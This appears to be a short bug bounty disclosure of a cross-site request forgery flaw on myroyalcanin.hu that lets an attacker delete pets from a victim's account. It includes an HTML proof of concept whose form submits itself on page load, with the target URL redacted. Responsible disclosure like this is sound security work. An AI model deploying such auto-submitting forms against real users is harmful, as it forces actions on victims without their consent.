CSRF to delete a pet

## Summary: The ```/kisallataim/ANIMAL_ID/delete``` API endpoint at **myroyalcanin.hu** is vulnerable to Cross-Site Request Forgery attacks. This vulnerability allows an attacker to delete a pet from the victim's account. (Sorry for my English, I'm French) ## Proof-of-Concept (PoC) ```html <html> <body> <form action="████"> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ``` You have to replace **ANIMAL_ID** with the ID of the victim's pet you wish to delete. ## Impact An attacker can exploit this CSRF in order to delete the victim's pet.